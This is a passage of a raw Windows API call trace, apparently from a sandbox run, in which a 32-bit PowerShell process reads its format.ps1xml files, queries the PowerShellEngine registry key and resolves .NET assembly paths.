lpOverlapped=0x0) returned 1 [0151.400] GetLastError () returned 0x0 [0151.400] ReadFile (in: hFile=0x31c, lpBuffer=0x2d1e58c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d1e58c*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0151.400] GetLastError () returned 0x0 [0151.400] CloseHandle (hObject=0x31c) returned 1 [0151.400] GetLastError () returned 0x0 [0151.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.400] GetLastError () returned 0x0 [0151.400] SetErrorMode (uMode=0x1) returned 0x1 [0151.400] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d2f648 | out: lpFileInformation=0x2d2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0151.400] GetLastError () returned 0x0 [0151.400] SetErrorMode (uMode=0x1) returned 0x1 [0151.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.400] GetLastError () returned 0x0 [0151.400] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e4c8 | out: phkResult=0x23e4c8*=0x31c) returned 0x0 [0151.401] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x0, lpcbData=0x23e50c*=0x0 | out: lpType=0x23e510*=0x1, lpData=0x0, lpcbData=0x23e50c*=0x56) returned 0x0 [0151.401] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x357e88, lpcbData=0x23e50c*=0x56 | out: lpType=0x23e510*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e50c*=0x56) returned 0x0 [0151.401] RegCloseKey (hKey=0x31c) returned 0x0 [0151.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.401] GetLastError () returned 0x0 [0151.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e004, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.401] GetLastError () returned 0x0 [0151.466] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x4f71d04d, Data2=0x56da, Data3=0x4b22, Data4=([0]=0x9a, [1]=0x3c, [2]=0x3d, [3]=0x86, [4]=0xf8, [5]=0xa5, [6]=0x87, [7]=0x59))) returned 0x0 [0151.511] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x4d9de662, Data2=0x7b97, Data3=0x404f, Data4=([0]=0x91, [1]=0x5e, [2]=0x7d, [3]=0xe2, [4]=0x74, [5]=0x63, [6]=0x80, [7]=0x88))) returned 0x0 [0151.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23dfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.513] GetLastError () returned 0x0 [0151.513] SetErrorMode (uMode=0x1) returned 0x1 [0151.513] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0151.513] GetLastError () returned 0x0 [0151.513] GetFileType (hFile=0x31c) returned 0x1 [0151.513] SetErrorMode (uMode=0x1) returned 0x1 [0151.513] GetFileType (hFile=0x31c) returned 0x1 [0151.514] ReadFile (in: hFile=0x31c, lpBuffer=0x2d42930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d42930*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.533] GetLastError () returned 0x0 [0151.538] ReadFile (in: hFile=0x31c, lpBuffer=0x2d42930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d42930*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.538] GetLastError () returned 0x0 [0151.538] ReadFile (in: hFile=0x31c, lpBuffer=0x2d42930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d42930*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.538] GetLastError () returned 0x0 [0151.539] ReadFile (in: hFile=0x31c, lpBuffer=0x2d42930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d42930*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.539] GetLastError () returned 0x0 [0151.539] ReadFile (in: hFile=0x31c, lpBuffer=0x2d42930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d42930*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.539] GetLastError () returned 0x0 [0151.540] ReadFile (in: hFile=0x31c, lpBuffer=0x2d42930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d42930*, lpNumberOfBytesRead=0x23e544*=0xfb2, lpOverlapped=0x0) returned 1 [0151.540] GetLastError () returned 0x0 [0151.540] ReadFile (in: hFile=0x31c, lpBuffer=0x2d42082, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d42082*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0151.540] GetLastError () returned 0x0 [0151.540] ReadFile (in: hFile=0x31c, lpBuffer=0x2d42930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d42930*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0151.540] GetLastError () returned 0x0 [0151.540] CloseHandle (hObject=0x31c) returned 1 [0151.540] GetLastError () returned 0x0 [0151.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.540] GetLastError () returned 0x0 [0151.540] SetErrorMode (uMode=0x1) returned 0x1 [0151.540] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d631c0 | out: lpFileInformation=0x2d631c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0151.541] GetLastError () returned 0x0 [0151.541] SetErrorMode (uMode=0x1) returned 0x1 [0151.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.541] GetLastError () returned 0x0 [0151.541] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e4c8 | out: phkResult=0x23e4c8*=0x31c) returned 0x0 [0151.541] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x0, lpcbData=0x23e50c*=0x0 | out: lpType=0x23e510*=0x1, lpData=0x0, lpcbData=0x23e50c*=0x56) returned 0x0 [0151.541] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x357e88, lpcbData=0x23e50c*=0x56 | out: lpType=0x23e510*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e50c*=0x56) returned 0x0 [0151.541] RegCloseKey (hKey=0x31c) returned 0x0 [0151.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.541] GetLastError () returned 0x0 [0151.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e004, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.542] GetLastError () returned 0x0 [0151.565] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xe69ff61e, Data2=0x8dc1, Data3=0x4a5d, Data4=([0]=0x9f, [1]=0x86, [2]=0xfa, [3]=0x8f, [4]=0xb9, [5]=0x50, [6]=0x9c, [7]=0xe7))) returned 0x0 [0151.574] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x968cea8c, Data2=0x485a, Data3=0x469b, Data4=([0]=0xa0, [1]=0x37, [2]=0xd9, [3]=0xa0, [4]=0x5d, [5]=0x15, [6]=0x9f, [7]=0xa2))) returned 0x0 [0151.576] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x1fd65e10, Data2=0xdf77, Data3=0x4312, Data4=([0]=0xac, [1]=0x69, [2]=0x69, [3]=0xe4, [4]=0xe2, [5]=0xb7, [6]=0xb7, [7]=0x97))) returned 0x0 [0151.576] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xf7c3a560, Data2=0xdb32, Data3=0x403e, Data4=([0]=0xa6, [1]=0xb3, [2]=0x5a, [3]=0x43, [4]=0x33, [5]=0x98, [6]=0xef, [7]=0x9b))) returned 0x0 [0151.577] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0xd44075e0, Data2=0x6a6a, Data3=0x4ae9, Data4=([0]=0x99, [1]=0x6f, [2]=0x90, [3]=0x10, [4]=0xcd, [5]=0xe3, [6]=0x32, [7]=0x9d))) returned 0x0 [0151.577] CoCreateGuid (in: pguid=0x23e538 | out: pguid=0x23e538*(Data1=0x92a5cd9b, Data2=0xc680, Data3=0x4608, Data4=([0]=0xa3, [1]=0x4f, [2]=0x10, [3]=0x6a, [4]=0x2f, [5]=0x22, [6]=0x56, [7]=0x65))) returned 0x0 [0151.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23dfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.577] GetLastError () returned 0x0 [0151.577] SetErrorMode (uMode=0x1) returned 0x1 [0151.577] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0151.577] GetLastError () returned 0x0 [0151.577] GetFileType (hFile=0x31c) returned 0x1 [0151.578] SetErrorMode (uMode=0x1) returned 0x1 [0151.578] GetFileType (hFile=0x31c) returned 0x1 [0151.578] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82b68*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.578] GetLastError () returned 0x0 [0151.578] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82b68*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.579] GetLastError () returned 0x0 [0151.579] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82b68*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.579] GetLastError () returned 0x0 [0151.579] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82b68*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.579] GetLastError () returned 0x0 [0151.581] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82b68*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.581] GetLastError () returned 0x0 [0151.581] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82b68*, lpNumberOfBytesRead=0x23e544*=0x1000, lpOverlapped=0x0) returned 1 [0151.581] GetLastError () returned 0x0 [0151.581] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82b68*, lpNumberOfBytesRead=0x23e544*=0xaca, lpOverlapped=0x0) returned 1 [0151.581] GetLastError () returned 0x0 [0151.581] ReadFile (in: hFile=0x31c, lpBuffer=0x2d821d2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d821d2*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0151.581] GetLastError () returned 0x0 [0151.582] ReadFile (in: hFile=0x31c, lpBuffer=0x2d82b68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e544, lpOverlapped=0x0 | out: lpBuffer=0x2d82b68*, lpNumberOfBytesRead=0x23e544*=0x0, lpOverlapped=0x0) returned 1 [0151.582] GetLastError () returned 0x0 [0151.582] CloseHandle (hObject=0x31c) returned 1 [0151.582] GetLastError () returned 0x0 [0151.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.582] GetLastError () returned 0x0 [0151.582] SetErrorMode (uMode=0x1) returned 0x1 [0151.582] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2da3b64 | out: lpFileInformation=0x2da3b64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0151.582] GetLastError () returned 0x0 [0151.582] SetErrorMode (uMode=0x1) returned 0x1 [0151.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.582] GetLastError () returned 0x0 [0151.582] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e4c8 | out: phkResult=0x23e4c8*=0x31c) returned 0x0 [0151.583] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x0, lpcbData=0x23e50c*=0x0 | out: lpType=0x23e510*=0x1, lpData=0x0, lpcbData=0x23e50c*=0x56) returned 0x0 [0151.583] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e510, lpData=0x357e88, lpcbData=0x23e50c*=0x56 | out: lpType=0x23e510*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e50c*=0x56) returned 0x0 [0151.583] RegCloseKey (hKey=0x31c) returned 0x0 [0151.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.583] GetLastError () returned 0x0 [0151.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x23e004, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.583] GetLastError () returned 0x0 [0151.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0151.640] GetLastError () returned 0x0 [0151.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0151.643] GetLastError () returned 0x57 [0151.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0151.652] GetLastError () returned 0x57 [0151.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.659] GetLastError () returned 0x57 [0151.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0151.661] GetLastError () returned 0x57 [0151.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0151.671] GetLastError () returned 0x57 [0151.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0151.683] GetLastError () returned 0x57 [0151.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0151.684] GetLastError () returned 0x57 [0151.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0151.690] GetLastError () returned 0x57 [0151.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0151.726] GetLastError () returned 0x57 [0151.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0151.736] GetLastError () returned 0x57 [0151.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0151.746] GetLastError () returned 0x57 [0151.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0151.760] GetLastError () returned 0x57 [0151.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0151.762] GetLastError () returned 0x57 [0151.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0151.783] GetLastError () returned 0x57 [0151.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0151.789] GetLastError () returned 0x57 [0151.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0151.789] GetLastError () returned 0x57 [0151.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x23dd34, lpFilePart=0x0 | out: 